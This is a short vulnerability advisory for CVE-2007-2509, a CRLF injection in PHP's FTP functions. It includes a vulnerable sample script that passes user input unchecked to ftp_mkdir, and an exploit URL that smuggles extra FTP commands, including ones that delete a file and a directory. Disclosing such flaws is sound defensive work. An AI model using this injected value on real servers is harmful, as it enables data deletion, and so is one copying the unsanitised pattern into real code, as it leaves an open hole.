Bug: CRLF injection in PHP ftp function ( Ascii Version )

Search:
WLB2

CRLF injection in PHP ftp function

Published
Credit
Risk
2007.05.12
fangxiaodun
Low
CWE
CVE
Local
Remote
CWE-20
CVE-2007-2509
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
2.6/10
2.9/10
4.9/10
Exploit range
Attack complexity
Authentication
Remote
High
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

We found that there was one crlf injection in php ftp ftuntion.As same as http,you can inject a 'rn other command' in
the paramer of a ftp function like ftp_mkdir,and then php would send the rn to your connected ftp server.The server
considerd there is a new command,and the other command would be executed.
For eg:

<?php
$ftp_server='http://www.loveshell.net';
$ftp_user_name='loveshell';
$ftp_user_pass='loveshell';
$command = $_GET['dir'];

$conn_id = ftp_connect($ftp_server);
$login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
if($command) ftp_mkdir($conn_id, $command);
.......

Exp: http://www.loveshell.net/test.php?dir=loveshell%0D%0AMKD jnc%0D%0ADELE jnc.txt%0D%0Armd test

The dir loveshell and jnc are created,the jnc.txt is deleted,and the dir test is deleted.

tested on php 5.1.6,other function is vul also.

loveshell[at]Bug.Center.Team

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version